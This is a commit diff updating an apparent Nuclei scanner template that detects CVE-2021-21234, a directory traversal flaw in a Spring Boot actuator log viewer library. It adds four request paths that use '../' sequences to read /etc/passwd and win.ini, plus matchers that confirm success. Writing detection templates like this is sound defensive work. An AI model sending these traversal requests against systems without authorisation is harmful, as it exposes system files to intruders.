Update CVE-2021-21234.yaml

cves/2021/CVE-2021-21234.yaml

@@ -2,15 +2,22 @@ id: CVE-2021-21234
 
 info:
   name: Spring Boot Actuator Logview - Directory Traversal
-  author: gy741
+  author: gy741,pikpikcu
   severity: high
-  reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
+  description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability.
+  reference: |
+    - https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21234
+    - https://github.com/cristianeph/vulnerability-actuator-log-viewer
   tags: cve,cve2021,springboot,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../"
+      - "{{BaseURL}}/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #Windows
+      - "{{BaseURL}}/log/view?filename=/windows/win.ini&base=../../../../../../../../../../" #windows
+      - "{{BaseURL}}/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux
+      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../../../../../../../../../" #linux
 
     matchers-condition: and
     matchers:
@@ -18,6 +25,10 @@ requests:
         part: body
         regex:
           - "root:.*:0:0"
+      - type: word
+        part: body
+        words:
+          - "for 16-bit app support"
 
       - type: status
         status: